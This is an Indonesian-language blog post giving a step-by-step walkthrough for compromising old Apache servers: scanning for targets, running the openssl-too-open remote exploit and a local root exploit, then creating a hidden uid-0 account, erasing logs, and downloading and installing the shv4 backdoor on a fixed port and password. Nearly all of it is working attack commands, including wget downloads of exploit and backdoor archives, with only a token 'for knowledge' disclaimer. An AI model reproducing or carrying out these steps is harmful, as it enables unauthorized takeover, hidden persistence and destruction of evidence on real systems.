Sabtu, 17 September 2011

0 Rooting Apache Lewat OpenSSL

Date: Sabtu, 17 September 2011 05.20
Category:
Author: deny saputra
Share:
Responds: 0 Comment

  1. Download Apache Chunked Scanner
  2. Download putty.exe
  3. Scanning for IP range menggunakan Apache Chunked Scanner
  4. Dapet target buka putty
  5. login ke shell account lewat ssh <— untuk user windows harus punya shell account di suatu server yang pakai linux langsung aja ke langkah 6 dan ngga perlu putty
  6. Download openSSL source code ke shell account kita dengan perintah ‘wget www.tempat-download.com/openssl-too-open.tar.gz’
  7. ekstrak file dengan perintah ‘tar -zxvf openssl-too-open.tar.gz’
  8. masuk ke direktorinya dengan mengetikan ‘cd openssl-too-open’
  9. ketik ‘make’ lalu ketik ‘chmod +x openssl’
  10. ketik ‘./openssl-too-open’ akan terlihat jenis2 server yang bisa di rooting
  11. target Scanning dari Apache Chunked Scanner anggap saja
    IP : 203.10.10.10
    Apache : Apache 1.3.23
    OS Linux : RedHat 7.3
    Maka ketikan ‘./openssl-too-open -a 0x0b -v 203.10.10.10′
  12. Mulai local xploit ketik ‘mkdir /var/tmp’ lalu masuk ke dir ketik ‘cd /var/tmp’
  13. Ketik ‘wget www.tempat-download.com/local.tar.gz’
  14. Ketik ‘tar xzf local.tar.gz’
  15. Ketik ‘cd local’
  16. Ketik ‘./lconfex -p’ akan diinformasikan shellcode, padstring, dan magic-number
  17. Buat direktori ‘segfault.eng’ dengan file ‘segfault.eng’ lalu command touch dan kemudian commad ‘./lconfex -s (shellcode) -m (padstring) -r (magic-number)
    untuk perintahnya:
    ‘mkdir segfault.eng ; touch segfault.eng/segfault.eng’
    ‘./lconfex -s (shellcode) -m (pandstring) -r (magic-number)’
    untuk perintah diatas masalah shellcode, padstring, magic-number kamu pasti tau setelah perintah 17 dijalankan.
  18. Ketik ‘id’ klo muncul —> root uid=0(root) gid=48(apache) groups=48(apache),89(sympa) <— anda adalah root

Tahap adduser, pembersihan log, backdoor


  1. ketik ‘/usr/sbin/useradd vr -u 0 -o -g root -s /bin/bash -d /dev/.vr passwd -d vr <— add user root nama vr
    /usr/sbin/useradd vr <— menambahkan login user nama vr
    root <— akses root
    /bin/bash -d /dev/.vr <— create dir vr
    passwd -d vr <— password vr
    * catatan : login, direktori dan password harus sama
  2. Buka new session pakek putty dan mulai login ke target
  3. Ketik ‘lastlog | grep vr’
  4. Download tools untuk menghapus jejak kita ketik ‘wget www.tempat-download.com/remove.c’
  5. compile file tersebut ketik ‘gcc -o r remove.c DGENERIC’
  6. hapus log user vr ketik ‘./remove vr’
  7. Install backdoor ketik ‘wget www.alamat-download.com/backdoor.tar.gz’
  8. ketik ‘tar xzf backdoor.tar.gz’
  9. Ketik ‘cd shv4′
  10. Ketik ‘./setup n3rd 6969′ —> n3rd = password login backdoor 6969 = port backdoor
  11. menghapus semua kemungkinan mengarah ke kita ; user dan direktori yang kita buat ketik ‘/usr/sbin/userdel -r vr’
  12. BERES… silahkan login ke shell dengan port 6969 dengan password n3rd pada target :p
Jangan diacak2 ya targetnya karena semua ini untuk pengetahuan segala bentuk penyalahgunaan bukan tanggung jawab saya.
VR-X69 (NERD)

//E.O.F

Artikel Terkait :



Posting Komentar